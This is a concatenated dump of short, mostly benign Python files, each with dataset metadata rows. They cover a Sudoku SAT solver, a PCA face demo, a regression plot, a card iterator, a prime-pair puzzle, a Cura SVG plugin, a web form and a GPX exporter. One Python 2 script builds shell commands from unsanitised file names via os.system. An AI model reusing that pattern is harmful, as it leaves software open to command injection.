res.append([v(i, j, d) for d in range(1, 10)])
# does not denote two different digits at once (36 clauses)
for d in range(1, 10):
for dp in range(d + 1, 10):
res.append([-v(i, j, d), -v(i, j, dp)])
def valid(cells):
for i, xi in enumerate(cells):
for j, xj in enumerate(cells):
if i < j:
for d in range(1, 10):
res.append([-v(xi[0], xi[1], d), -v(xj[0], xj[1], d)])
# ensure rows and columns have distinct values
for i in range(1, 10):
valid([(i, j) for j in range(1, 10)])
valid([(j, i) for j in range(1, 10)])
# ensure 3x3 sub-grids "regions" have distinct values
for i in 1, 4, 7:
for j in 1, 4 ,7:
valid([(i + k % 3, j + k // 3) for k in range(9)])
assert len(res) == 81 * (1 + 36) + 27 * 324
return res
def solve(grid):
#solve a Sudoku problem
clauses = sudoku_clauses()
for i in range(1, 10):
for j in range(1, 10):
d = grid[i - 1][j - 1]
# For each digit already known, a clause (with one literal).
if d:
clauses.append([v(i, j, d)])
# Print number SAT clause
numclause = len(clauses)
print ("P CNF " + str(numclause) +"(number of clauses)")
# solve the SAT problem
start = time.time()
sol = set(pycosat.solve(clauses))
end = time.time()
print("Time: "+str(end - start))
def read_cell(i, j):
# return the digit of cell i, j according to the solution
for d in range(1, 10):
if v(i, j, d) in sol:
return d
for i in range(1, 10):
for j in range(1, 10):
grid[i - 1][j - 1] = read_cell(i, j)
if __name__ == '__main__':
from pprint import pprint
# Sudoku problem generated by websudoku.com
easy = [[0, 0, 0, 1, 0, 9, 4, 2, 7],
[1, 0, 9, 8, 0, 0, 0, 0, 6],
[0, 0, 7, 0, 5, 0, 1, 0, 8],
[0, 5, 6, 0, 0, 0, 0, 8, 2],
[0, 0, 0, 0, 2, 0, 0, 0, 0],
[9, 4, 0, 0, 0, 0, 6, 1, 0],
[7, 0, 4, 0, 6, 0, 9, 0, 0],
[6, 0, 0, 0, 0, 8, 2, 0, 5],
[2, 9, 5, 3, 0, 1, 0, 0, 0]]
medium = [[5, 8, 0, 0, 0, 1, 0, 0, 0],
[0, 3, 0, 0, 6, 0, 0, 7, 0],
[9, 0, 0, 3, 2, 0, 1, 0, 6],
[0, 0, 0, 0, 0, 0, 0, 5, 0],
[3, 0, 9, 0, 0, 0, 2, 0, 1],
[0, 5, 0, 0, 0, 0, 0, 0, 0],
[6, 0, 2, 0, 5, 7, 0, 0, 8],
[0, 4, 0, 0, 8, 0, 0, 1, 0],
[0, 0, 0, 1, 0, 0, 0, 6, 5]]
evil = [[0, 2, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 6, 0, 0, 0, 0, 3],
[0, 7, 4, 0, 8, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 3, 0, 0, 2],
[0, 8, 0, 0, 4, 0, 0, 1, 0],
[6, 0, 0, 5, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 7, 8, 0],
[5, 0, 0, 0, 0, 9, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 4, 0]]
hard = [[0, 2, 0, 0, 0, 0, 0, 3, 0],
[0, 0, 0, 6, 0, 1, 0, 0, 0],
[0, 6, 8, 2, 0, 0, 0, 0, 5],
[0, 0, 9, 0, 0, 8, 3, 0, 0],
[0, 4, 6, 0, 0, 0, 7, 5, 0],
[0, 0, 1, 3, 0, 0, 4, 0, 0],
[9, 0, 0, 0, 0, 7, 5, 1, 0],
[0, 0, 0, 1, 0, 4, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 9, 0]]
blank = [[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0]]
if(len(sys.argv[1:]) == 0):
print('Argument error, check --help')
else:
main(sys.argv[1:])
app.run(debug=True)
| true |
f7ad66a1227e10d3dd437019af98370f9e396fc3 | Python | girish/utils | /dumps/copyallfiles_above_500_words.py | UTF-8 | 363 | 2.65625 | 3 | [] | no_license | import os
import sys
import commands
files= commands.getoutput("find %s -type f | grep '\.txt'" %(sys.argv[1])).split("\n")
count= 0
for file in files:
#print count
word_count=commands.getoutput("wc -w %s" %(file)).split(" ")[0]
if int(word_count) > 450 :
print word_count
print file
os.system("cp %s %s/%d.txt" %(file, sys.argv[2], count))
count +=1
| true |
f6e5844c11a4098c1eacd40854cac4463b1d795f | Python | slamdunk0414/python | /3.字符串列表数组/1.字符串.py | UTF-8 | 393 | 4.25 | 4 | [] | no_license |
# 这就是一个字符串
name = 'laozhang'
# 输入 input
# input('请输入一个字符串')
# 输出 print
# print('输出字符串')
# 字符串的加法
a = 'ni'
b = 'hao'
c = a + b
print(c)
# 字符串的另外一种加法
e = '===%s==='%(a+b)
print(e)
# 字符串下标
name = 'laozhang'
a = name[1]
print(a)
# 取字符串最后一个字符 -1下标
b = name[-1]
print(b) | true |
e6e70adb67f901f4d82187a1c42708168aeb57b9 | Python | Algorithm-P0/meanjung | /2020/1try/5_dp/11057.py | UTF-8 | 251 | 2.640625 | 3 | [] | no_license | import sys
N = int(sys.stdin.readline())
dp=[[0]*10 for _ in range(N+1)]
dp[1]=[1]*10
for i in range(2, N+1):
for j in range(10):
s=0
for k in range(j,10):
s+=dp[i-1][k]
dp[i][j]=s%10007
print(sum(dp[N])%10007)
| true |
75f330c43692214728b87e77a5e1df5c1e90941d | Python | 1emb/AI-1 | /PCA .py | UTF-8 | 2,236 | 2.578125 | 3 | [] | no_license | import os
import numpy as np
from scipy import misc # Import tat ca moi thu can
import cv2
import matplotlib.pyplot as plt
np.random.seed(9)
# Doc file
path = 'D:/Minh/Python/YALE/unpadded/' # path to the database
ids = range(1, 16) # 15 persons
states = ['centerlight', 'glasses', 'happy', 'leftlight',
'noglasses', 'normal', 'rightlight','sad',
'sleepy', 'surprised', 'wink' ]
prefix = 'subject'
surfix = '.pgm'
# data dimension
h = 116 # hight
w = 98 # width
D = h * w
N = len(states)*15
K = 100
# collect all data
X = np.zeros((D, N))
cnt = 0
for person_id in range(1, 16):
for state in states:
fn = path + prefix + str(person_id).zfill(2) + '.' + state + surfix
X[:, cnt] = misc.imread(fn).reshape(D)
cnt += 1
# Doing PCA, note that each row is a datapoint
from sklearn.decomposition import PCA
pca = PCA(n_components=K) # K = 100
pca.fit(X.T)
# projection matrix
U = pca.components_.T
for person_id in range(1, 7):
for state in ['centerlight']:
fn = path + prefix + str(person_id).zfill(2) + '.' + state + surfix
im = misc.imread(fn)
plt.axis('off')
f1 = plt.imshow(im, interpolation='nearest')
f1.axes.get_xaxis().set_visible(True)
f1.axes.get_yaxis().set_visible(False)
plt.gray()
fn = 'ori' + str(person_id).zfill(2) + '.png'
plt.savefig(fn, bbox_inches='tight', pad_inches=0)
plt.show()
# reshape and subtract mean
x = im.reshape(D, 1) - pca.mean_.reshape(D, 1)
# encode
z = U.T.dot(x)
#decode
x_tilde = U.dot(z) + pca.mean_.reshape(D, 1)
# reshape to orginal dim
im_tilde = x_tilde.reshape(116, 98)
#Tinh Reconstruction Error
loss = np.sqrt(np.sum((im - im_tilde)**2))
loss /= im.size
print(loss)
#Ve hinh reconstruct
plt.axis('on')
f1 = plt.imshow(im_tilde, interpolation='nearest')
f1.axes.get_xaxis().set_visible(False)
f1.axes.get_yaxis().set_visible(False)
plt.gray()
fn = 'res' + str(person_id).zfill(2) + '.png'
plt.savefig(fn, bbox_inches='tight', pad_inches=0)
plt.show()
| true |
5fb5647e7f3712cf9eaf3101873ea4b67b11086e | Python | iriszero48/Trash | /sese/4.py | UTF-8 | 996 | 2.671875 | 3 | [
"MIT"
] | permissive | import json
import os
import sys
base_path = ''
with open('', 'w', encoding='utf-8') as out:
fp = os.path.join(base_path, '')
sys.stderr.write(f'-> {fp}\n')
with open(fp, 'r', encoding='utf-8') as fs:
for line in filter(lambda l: len(l) != 0, map(lambda l: l.removesuffix('\r\n').removesuffix('\n'), fs)):
out.write(json.dumps({'': line}, ensure_ascii=False) + '\n')
for cwd, _, files in os.walk(os.path.join(base_path, '')):
dir = os.path.basename(cwd)
find_pos = [dir.find('('), dir.find('(')]
dir = dir[:max(find_pos)]
for filename in files:
fp = os.path.join(cwd, filename)
sys.stderr.write(f'-> {fp}\n')
with open(fp, 'r', encoding='ansi') as fs:
for line in filter(lambda l: len(l) != 0, map(lambda l: l.removesuffix('\r\n').removesuffix('\n'), fs)):
out.write(json.dumps(
{'': line, '': dir}, ensure_ascii=False) + '\n')
| true |
337b2091255aba23d091385f580655f710ab5c52 | Python | nahaza/pythonTraining | /ua/univer/HW04/ch06ProgTrain05.py | UTF-8 | 521 | 4.3125 | 4 | [] | no_license | # 5. Sum of Numbers
# Assume a file containing a series of integers is named numbers.txt and exists
# on the computer’s disk. Write a program that reads all of the numbers stored in the file and calculates
# their total.
def main():
total = 0
fromFile = open('numbers.txt', 'r')
numb = fromFile.readline()
for numb in fromFile:
numb = int(numb.rstrip('\n'))
total += numb
numb = fromFile.readline()
print(total)
fromFile.close()
if __name__ == '__main__':
main()
| true |
a490c78657f1f985d024fc2d0571d42e6ee2b55e | Python | prashantstha1717/IWPythonProject | /IWPythonProject/data_types/Q6.py | UTF-8 | 644 | 4.15625 | 4 | [] | no_license | # Write a Python program to find the first appearance of the substring 'not' and
# 'poor' from a given string, if 'not' follows the 'poor', replace the whole 'not'...'poor'
# substring with 'good'. Return the resulting string.
# Sample String : 'The lyrics is not that poor!'
# 'The lyrics is poor!'
# Expected Result : 'The lyrics is good!'
# 'The lyrics is poor!
def out6(str1):
nots = str1.find('not')
poors = str1.find('poor')
if poors > nots and nots > 0 and poors > 0:
str1 = str1.replace(str1[nots:(poors + 4)], 'good')
return str1
else:
return str1
print(out6('The lyrics is not that poor'))
| true |
c9854220baf1fc202dc50cb95958a103d0f163b2 | Python | Little-old-brother-team/GroupWork | /Week2/Method2.py | UTF-8 | 653 | 3.5625 | 4 | [] | no_license | from datetime import datetime
def whatday(Year, Month, Day):
# Calculate day gap
checkDay = datetime(1900, 1, 1)
targetDay = datetime(Year, Month, Day)
Days = (targetDay - checkDay).days
weekDay = (Days+1) % 7
if weekDay == 1:
daystr = 'Monday'
elif weekDay == 2:
daystr = 'Tuesday'
elif weekDay == 3:
daystr = 'Wednesday'
elif weekDay == 4:
daystr = 'Thursday'
elif weekDay == 5:
daystr = 'Friday'
elif weekDay == 6:
daystr = 'Saturday'
elif weekDay == 0:
daystr = 'Sunday'
return daystr
print(whatday(1993,6,23)) | true |
ead980af51edd2d4170960d38535e4f5847a2e08 | Python | Shubhrima/Birthday-Wishing-Instagram-Bot | /automated messages.py | UTF-8 | 2,792 | 2.90625 | 3 | [] | no_license | from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from time import sleep
import pandas
import datetime as dt
CHROME_DRIVER_PATH ="C:\development\chromedriver.exe"
USERNAME = input('Enter instagram handle: ')
PASSWORD = input('Enter password: ')
class Automated_Message:
def __init__(self, CHROME_DRIVER_PATH):
self.driver = webdriver.Chrome(executable_path=CHROME_DRIVER_PATH)
self.driver.get('https://www.instagram.com/accounts/login/')
sleep(5)
def login(self, ig_handle, login_password):
username = self.driver.find_element_by_name("username")
password = self.driver.find_element_by_name("password")
username.send_keys(ig_handle)
password.send_keys(login_password)
log_in = self.driver.find_element_by_css_selector('button.sqdOP.L3NKy.y3zKF')
log_in.click()
sleep(5)
def check_birthday(self):
try:
now = dt.datetime.today()
content = pandas.read_csv('birthday.csv')
today_date = now.day
today_month = now.month
birth_date = content['day']
content_dict = content.to_dict() # converting to dictionary
birthdate_day_list = birth_date.to_list()
birthdate_month_list = content['month'].to_list()
content_df = content[(content['day'] == today_date) & (content['month'] == today_month)]
birthday_person = str(content_df.iloc[0]['name'])
print(birthday_person)
birthday_acc = str(content_df.iloc[0]['email'])
print(birthday_acc)
MESSAGE = 'Happy Birthday'
except:
MESSAGE = 'No birthdays today'
birthday_acc = '_shubhrima_'
msg = self.driver.find_element_by_css_selector('.xWeGp svg')
msg.click()
print('step 1')
sleep(5)
not_now = self.driver.find_element_by_css_selector('button.aOOlW.HoLwm ')
not_now.click()
sleep(5)
send = self.driver.find_element_by_css_selector('button.sqdOP.L3NKy.y3zKF')
send.click()
print('step 2')
text = self.driver.find_element_by_name('queryBox')
text.send_keys(birthday_acc)
print('step 3')
sleep(3)
choose = self.driver.find_element_by_css_selector('button.dCJp8 span')
choose.click()
print('step 4')
next = self.driver.find_element_by_xpath('/html/body/div[5]/div/div/div[1]/div/div[2]/div/button/div')
next.click()
sleep(4)
message = self.driver.find_element_by_css_selector('textarea')
message.send_keys(MESSAGE)
message.send_keys(Keys.ENTER)
bot = Automated_Message(CHROME_DRIVER_PATH)
bot.login(USERNAME, PASSWORD)
bot.check_birthday()
| true |
39e705919137bf72f9e699751be82fb4f98c1422 | Python | HenriBranken/ML_Raschka | /henris_coding/chapter_10/j_log_sqrt.py | UTF-8 | 1,163 | 2.90625 | 3 | [] | no_license | from sklearn.linear_model import LinearRegression
from sklearn.metrics import r2_score
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
df = pd.read_csv("./housing_data.txt", sep="\s+", header=None)
df.columns = ["CRIM", "ZN", "INDUS", "CHAS", "NOX", "RM", "AGE", "DIS", "RAD",
"TAX", "PTRATIO", "B", "LSTAT", "MEDV"]
X = df[["LSTAT"]].values
y = df["MEDV"].values
regr = LinearRegression()
# Transform the features
X_log = np.log(X)
y_sqrt = np.sqrt(y)
# Fit the features
regr = regr.fit(X_log, y_sqrt)
X_fit = np.arange(X_log.min() - 1, X_log.max() + 1, 1)[:, np.newaxis]
y_lin_fit = regr.predict(X_fit)
r2_linear = r2_score(y_true=y_sqrt, y_pred=regr.predict(X_log))
print("regr.coef_ = {}.".format(regr.coef_))
print("regr.intercept_ = {}.".format(regr.intercept_))
# Plot the results
plt.scatter(X_log, y_sqrt, label="Training Points", color="silver",
edgecolor="silver")
plt.plot(X_fit, y_lin_fit,
label="Linear (d=1), R^2 = {:.3f}".format(r2_linear), c="blue", lw=2)
plt.xlabel("log(% LSTAT)")
plt.ylabel("sqrt([MEDV])")
plt.legend(loc="lower left")
plt.tight_layout()
plt.grid()
plt.show()
| true |
645631ed2ba53b0fada02030db55da896db60aed | Python | Gustaft86/trybe-exercises | /modulo4_ciencia/bloco_34/dia_3/exercicios_dia/exercicio_2_SOLUCAO.py | UTF-8 | 2,149 | 3.578125 | 4 | [] | no_license | from collections.abc import Iterator, Iterable
class Carta:
def __init__(self, valor, naipe):
self.valor = valor
self.naipe = naipe
def __repr__(self):
return "<%s de %s>" % (self.valor, self.naipe)
class IteradorDoBaralho(Iterator):
def __init__(self, cartas):
self._cartas = cartas
self._pos = 0
def __next__(self):
try:
carta = self._cartas[self._pos]
except IndexError:
raise StopIteration()
else:
self._pos += 1
return carta
class Baralho(Iterable):
naipes = "copas ouros espadas paus".split()
valores = "A 2 3 4 5 6 7 8 9 10 J Q K".split()
def __init__(self):
self._cartas = [
Carta(valor, naipe)
for naipe in self.naipes
for valor in self.valores
]
def __len__(self):
return len(self._cartas)
def __iter__(self):
return IteradorDoBaralho(self._cartas)
# >>> carteado = Baralho()
# >>> teste = {cartas for cartas in carteado}
# >>> print(teste)
# {
# <J de ouros>,
# <3 de copas>,
# <6 de paus>,
# <Q de ouros>,
# <4 de copas>,
# <7 de paus>,
# <K de ouros>,
# <5 de copas>,
# <8 de paus>,
# <A de espadas>,
# <6 de copas>,
# <9 de paus>,
# <2 de espadas>,
# <7 de copas>,
# <10 de paus>,
# <3 de espadas>,
# <8 de copas>,
# <J de paus>,
# <4 de espadas>,
# <9 de copas>,
# <Q de paus>,
# <5 de espadas>,
# <10 de copas>,
# <K de paus>,
# <6 de espadas>,
# <J de copas>,
# <7 de espadas>,
# <Q de copas>,
# <8 de espadas>,
# <K de copas>,
# <9 de espadas>,
# <A de ouros>,
# <10 de espadas>,
# <2 de ouros>,
# <J de espadas>,
# <3 de ouros>,
# <Q de espadas>,
# <4 de ouros>,
# <K de espadas>,
# <5 de ouros>,
# <A de paus>,
# <6 de ouros>,
# <2 de paus>,
# <7 de ouros>,
# <3 de paus>,
# <8 de ouros>,
# <4 de paus>,
# <9 de ouros>,
# <A de copas>,
# <5 de paus>,
# <10 de ouros>,
# <2 de copas>
# }
# >>>
| true |
ffd91e4f80b7eb941cc9f8bf15ac9e7c5350f1e5 | Python | aryan-upa/CompetitiveCodes | /ConsecutivePrimes(Kickstart2021).py | UTF-8 | 1,623 | 3.734375 | 4 | [] | no_license | # Google Kickstart 2021, Round B, Ques 3
# https://codingcompetitions.withgoogle.com/kickstart/round/0000000000435a5b/000000000077a8e6#problem
from math import ceil,floor,sqrt
def prime(x):
if x==1:
return 0
elif x==2:
return 1
else:
val = ceil(sqrt(x))
for p in range(2, val+1):
if x % p == 0:
return 0
else:
return 1
z= input()
fp = ceil(sqrt(int(z)))
while True:
if prime(fp):
break
fp+=1
p = fp-1
while True:
if prime(p):
break
p-=1
r = fp+1
while True:
if prime(r):
break
r+=1
if r*fp<=int(z):
print(fp,r)
print(fp*r)
else:
print(p,fp)
print(p*fp)
# For Solution in C++:
# The actual solution used yarin's sieve to store data which is multiplication of those prime numbers.
# Actually we needed to find first prime number smaller than root of z and then a prime no. just smaller than that
# and a prime number just greater than that. Our answer will lie in only the two possibilities given.
# If those prime numbers are [p,q,r] then our possible answer will be either p*q or q*r, not anything else than this.
# We need to keep this in mind as well that the greatest difference between any two prime numbers is in range of 10^9,
# and so we need to calculate prime check for all the values in between, but in C++ this primality check is much faster
# and it runs in about 7 seconds for all the values.
# Also there's a corner case for numbers less than 15 as, for those the only solution is 2,3 i.e. 6.
| true |
823b542287017c3e1c515df071147272d907fbe4 | Python | 1221mark/UItest | /conftest.py | UTF-8 | 646 | 2.5625 | 3 | [] | no_license | """conftest.py 文件名称是固定的。
统一存放 fixture 的地方。
"""
import pytest
from selenium import webdriver
from selenium.webdriver import ChromeOptions
@pytest.fixture(scope="session",autouse=True)
def get_browser():
options = ChromeOptions()
#设置浏览器路径
options.binary_location = r"C:\Users\lenovo\AppData\Local\Google\Chrome\Application\chrome.exe"
driver = webdriver.Chrome(options = options)
# 最大化当前页
driver.maximize_window()
# 设置隐式等待
wait_time = 20
driver.implicitly_wait(wait_time)
yield driver
driver.quit()
| true |
8047fef3648b673605fd955b2e61cdbf059870e2 | Python | kroze05/Tarea_Ejercicios | /ejercicio_3.py | UTF-8 | 749 | 4.5625 | 5 | [] | no_license | # EJERCICIO 3.- Dados dos números, mostrar la suma, resta, división y multiplicación de ambos
val_1=float(input("coloca un número\n"))
val_2=float(input("coloca el segudo número\n"))
suma = val_1 + val_2
resta_1 = val_1 - val_2
resta_2 = val_2 - val_1
multiplicacion = val_1 * val_2
division_1 = val_1 / val_2
division_2 = val_2 / val_1
print (f"la suma de los terminos es: {suma}")
print (f"la resta de el primer termino con el segundo es: {resta_1}")
print (f"la resta de el segundo termino con el primero es: {resta_2}")
print (f"la mnultiplicacion de los terminos es: {multiplicacion}")
print (f"la division de el primer termino con el segundo es: {division_1}")
print (f"la division de el segundo termino con el primero es: {division_2}") | true |
f08189cfef07bafa7d133f384c383132edf596a4 | Python | MY-KHEL/python-projects | /work.py | UTF-8 | 2,527 | 3.546875 | 4 | [] | no_license | customerName = input('Please input your Name: ').capitalize()
print()
#Beginning of the Phone Number Session
customerPhone = str(0)
while len(customerPhone) != 11 :
customerPhone = str(input('Please input your Phone Number: '))
if len(customerPhone) != 11 :
print('Number must be 11 digits')
if customerPhone[0]!= '0':
print('Number must start from 0')
while customerPhone[0]!= '0':
customerPhone = str(input('Please input your Phone Number: '))
if customerPhone[0]!= '0':
print('Number must start from 0')
if len(customerPhone) != 11 :
print('Number must be 11 digits')
print()
print('Lets move on')
print()
#End of the validation of the Phone number
#Starting with the Email aspects:
customerEmail = input('Enter your email: ')
while('@gmail.com' or '@hotmail.com' or '@yahoo.com') not in customerEmail:
customerEmail = input('Your email address must have @gmail.com or @hotmail.com or @yahoo.com \n')
print('_'*40)
print()
item = {'rice':240,'beans':120,'egg':50,'biscuit':10,'beef':400,'drink':100}
print('Welcome to Mykhel Stores')
print()
print('This is what we have in store and their prices. Choose your order from the items below')
print(item)
n = int(input('\n How many Goods are you buying: '))
purchase = {}
for i in range(n):
itemName = input('Enter your Order \n').lower()
while itemName not in item.keys():
itemName = input('We dont have that in store, check the Store for items we have \n').lower()
print()
itemQuantity = int(input('How many of this product are you buying: '))
itemPrice = item[itemName]
totalPrice = str(itemPrice*itemQuantity)
print('Price for one : ',itemPrice)
print('Price for ',itemQuantity,': ',totalPrice)
purchase[itemName]=itemQuantity
i += 1
totalValue = {}
print()
print('_'*100)
print()
print('Get your Invoice')
print()
print('Name: ',customerName)
print()
print('Phone Number: ',customerPhone)
print()
print('Email: ',customerEmail)
print()
print('Keep shopping at Mykhel Stores')
print('_'*40)
print('Item',' '*9,'Qty',' '*7, 'Total')
print()
for key, value in purchase.items():
print(key, '-' * 10, value, '-' * 10, value * item.get(key))
totalValue[key] = value * item.get(key)
print(' ' * 40)
print('Total', '-' * 22, sum(total_value.values()))
print('\n Thank you for Shopping with us!') | true |
560c52f1f7a2e564b42907223ec85092f4055106 | Python | lsjroberts/tcp | /game/scene/hacking.py | UTF-8 | 835 | 2.65625 | 3 | [] | no_license | # ------- Hacking Scene -------
# Where shit gets hacked yo.
# -----------------------------
# -------- Imports --------
import config
from app.world import Scene, SceneLayer
from app.popup import Popup
from game.code import Parser, Compiler, Executer
# ----------- Hacking Scene -----------
# 01110101011
class HackingScene( Scene ):
def __init__( self ):
Scene.__init__( self )
self.addLayer( SceneLayer(
"hacking/wall-floor.jpg",
config.spriteLayers['sceneFar']
) )
self.addLayer( SceneLayer(
'hacking/desk.jpg',
config.spriteLayers['sceneFar'] - 1
) )
self.addLayer( SceneLayer(
'hacking/chair.jpg',
config.spriteLayers['sceneNear']
) )
class CodePopup( Popup ):
def execute( self ):
parsed = Parser( self.code )
compiled = Compiler( parsed )
result = Executer( compiled ) | true |
e339c4d3fe798de19d15c15ecd679fb4853a19ee | Python | twosilly/SVGReader | /__init__.py | UTF-8 | 1,166 | 2.65625 | 3 | [] | no_license | # Copyright (c) 2017 Ultimaker B.V.
# This example is released under the terms of the AGPLv3 or higher.
from . import SVGReader
## 为插件定义额外的元数据。
#
# 文件阅读器类型插件必须指定一些附加的元数据
# 能够读取的文件类型
# 某些类型的插件需要其他元数据,例如哪些文件类型
# #他们能够阅读或他们定义的工具的名称。 如果是
# #“扩展”类型的插件,虽然没有其他元数据。
def getMetaData():
return {
"mesh_reader": [ #一个阅读器可能能够读取多个文件类型,所以这是一个列表。
{
"extension": "svg",
"description": "svg file type"
}
]
}
## 让铀知道这个插件存在。
#
# 在启动应用程序以查找哪些插件时调用此方法
# #存在以及它们的类型。 我们需要返回一个字典映射
# #表示对象的插件类型(在本例中为“扩展名”)的字符串
# #继承自PluginObject。
#
# \param app 插件需要注册的应用程序。
def register(app):
return {"mesh_reader": SVGReader.SVGFileReader()}
| true |
5fa5c8a88589d0374070784dd9ed0759bb91e9e7 | Python | hendersontrent/theft | /inst/python/kats_calculator.py | UTF-8 | 885 | 2.9375 | 3 | [
"MIT"
] | permissive | #---------------------------------------
# This script sets out to define a call
# to {Kats} to calculate all available
# features on a given input time series
#---------------------------------------
#---------------------------------------
# Author: Trent Henderson, 24 June 2021
#---------------------------------------
def kats_calculator(timepoints, values):
import pandas as pd
from kats.consts import TimeSeriesData
from kats.tsfeatures.tsfeatures import TsFeatures
# Transform data to correct object
data = pd.DataFrame({'time':timepoints, 'value':values})
data['time'] = pd.to_datetime(data['time'])
data['time'] = [x.date() for x in data.time]
data = TimeSeriesData(data)
# Instantiate TsFeatures
model = TsFeatures()
# Run calculations
extracted_features = model.transform(data)
return extracted_features
| true |
59e216af8e0b3643fe120efc588d1daff23e87b1 | Python | rpfk/python-kafka-producer | /Factory/Factory.py | UTF-8 | 2,541 | 2.828125 | 3 | [] | no_license | import importlib
import threading
import time
from numpy.random import choice
from faker import Faker
from bisect import bisect
class Factory(threading.Thread):
daemon = True
def __init__(self, assignment, producer, *args, **kwargs):
super(Factory, self).__init__(*args, **kwargs)
self.assignment = assignment
self.producer = producer
self.faker = Faker()
self.products = self.create_products(assignment)
self.production_rate = [int(s) for s in assignment['production_rate'].keys()]
self.topic_mapping = [int(s) for s in assignment['topic_mapping'].keys()]
@staticmethod
def get_product(module_name, class_name):
# load the module, will raise ImportError if module cannot be loaded
m = importlib.import_module(module_name)
# get the class, will raise AttributeError if class cannot be found
c = getattr(m, class_name)
return c
def create_products(self, assignment):
products = []
for product in assignment['products']:
products.append(self.get_product('Factory.Product', product))
return products
def run(self):
start = time.time()
while True:
run_time = time.time() - start
# get the production rate as defined in the factory assignment
rate = self.assignment['production_rate'][str(self.production_rate[bisect(self.production_rate, run_time) - 1])]
# get the send mapping as defined in the factory assignment
topics = self.assignment['topic_mapping'][str(self.topic_mapping[bisect(self.topic_mapping, run_time) - 1])]
# get the product to deliver
product = choice(self.products, 1, p=self.assignment['product_weights'])[0]
# deliver the product
self.deliver(product(self.faker), topics)
# for debugging
print time.time()
# determine the time to next delivery based on the production rate defined in the factory assignment
time.sleep(1 / float(rate) - (run_time % (1 / float(rate))))
def deliver(self, product, topic_mapping):
for index, map_topic in enumerate(topic_mapping):
if map_topic:
# for debugging
print self.assignment['topics'][index], product.key, product.value
# send the product as message over Kafka
self.producer.send(self.assignment['topics'][index], key=product.key, value=product.value)
| true |
723f08ac7423d461d8daeb9e6304a2fe06124db1 | Python | mukoedo1993/Python_related | /python_official_tutorial/chap5_2/del_statement.py | UTF-8 | 286 | 3 | 3 | [] | no_license | import copy
a = [-1, 1, 66.25, 333, 333, 1234.5];a1=copy.deepcopy(a);a2=copy.deepcopy(a);a3=copy.deepcopy(a)
del a[0];print(a)
del a1[2:4];print(a1)
del a2[:];print(a2)
del a3#; print(a3)
"""
Reference to a3 hereafter is an error(at least until other value is assigned to it.)
""" | true |
20da47f027a46fc2728533c385baaeca906750cd | Python | aziaziazi/Udacity-ITPN | /Stage4/4.6.2_Vérification/verification/main.py | UTF-8 | 1,720 | 3.46875 | 3 | [] | no_license | # Lession 4.6: Responding Based on Verification
# This session will show us how we can put in custom responses in our server in order to respond
# to a user whether the birthday entered is valid or not
# https://www.udacity.com/course/viewer#!/c-nd000/l-4175328805/m-48714318
import webapp2
import valid_date
form = """
<form method="post">
What is your birthday?
<br>
<label> Month
<input type="text" name="month" value="%(month)s">
</label>
<label> Day
<input type="text" name="day" value="%(day)s">
</label>
<label> Year
<input type="text" name="year" value="%(year)s">
</label>
<div style="color:red">%(error)s</div>
<br>
<br>
<input type="submit">
</form>
"""
class MainPage(webapp2.RequestHandler):
def write_form(self, error="", month="", day="", year=""):
self.response.out.write(form % {"error" : error,
"month" : month,
"day" : day,
"year" : year})
def get(self):
self.write_form()
def post(self):
user_month = self.request.get("month")
user_day = self.request.get("day")
user_year = self.request.get("year")
month = valid_date.valid_month(user_month)
day = valid_date.valid_day(user_day)
year = valid_date.valid_year(user_year)
if (month and day and year):
self.response.out.write("Thanks beeing so good at selecting dates!")
else:
self.write_form("That's not valid to me, my friend", user_month, user_day, user_year)
app = webapp2.WSGIApplication([("/", MainPage)], debug = True)
| true |
c52bad5616976be852becacb31d6a29fe3812811 | Python | JWCook/pyinaturalist | /examples/observations_to_gpx.py | UTF-8 | 3,451 | 3.015625 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env python3
"""
An example of converting observation locations + metadata into GPX format.
Extra dependencies:
``pip install gpxpy``
"""
from logging import getLogger
from gpxpy.gpx import GPX, GPXTrack, GPXTrackPoint, GPXTrackSegment, GPXWaypoint
from pyinaturalist import Observation, get_observations
from pyinaturalist.constants import JsonResponse, List
from pyinaturalist.response_format import convert_observation_timestamps
logger = getLogger(__name__)
def observations_to_gpx(
observations: List[JsonResponse], output_file: str = "observations.gpx", track: bool = True
):
"""Convert a list of observations to a set of GPX waypoints or a GPX track
Args:
observations: JSON observations
output_file: File path to write to
track: Create an ordered GXP track; otherwise, create unordered GPX waypoints
"""
gpx = GPX()
logger.info(f"Converting {len(observations)} to GPX points")
points = [observation_to_gpx_point(obs, track=track) for obs in observations]
if track:
gpx_track = GPXTrack()
gpx.tracks.append(gpx_track)
gpx_segment = GPXTrackSegment()
gpx_track.segments.append(gpx_segment)
gpx_segment.points = points
else:
gpx.waypoints = points
# Save to file
logger.info(f"Writing GPX data to {output_file}")
with open(output_file, "w") as f:
f.write(gpx.to_xml())
def observation_to_gpx_point(observation: JsonResponse, track: bool = True):
"""Convert a single observation to a GPX point
Args:
observation: JSON observation
track: Indicates that this point is part of an ordered GXP track;
otherwise, assume it is an unordered waypoint
"""
logger.debug(f'Processing observation {observation["id"]}')
# GeoJSON coordinates are ordered as `longitude, latitude`
long, lat = observation["geojson"]["coordinates"]
# Get medium-sized photo URL, if available; otherwise just use observation URL
if observation["photos"]:
link = observation["photos"][0]["url"].replace("square", "medium")
else:
link = observation["uri"]
point_cls = GPXTrackPoint if track else GPXWaypoint
point = point_cls(
latitude=lat,
longitude=long,
time=convert_observation_timestamps(observation),
comment=str(Observation.from_json(observation)),
)
point.description = observation["description"]
point.link = link
point.link_text = f'Observation {observation["id"]}'
return point
if __name__ == "__main__":
# Get first page of search results (for testing)
search_params = {
"project_id": 36883, # ID of the 'Sugarloaf Ridge State Park' project
"created_d1": "2020-01-01", # Get observations from January 2020...
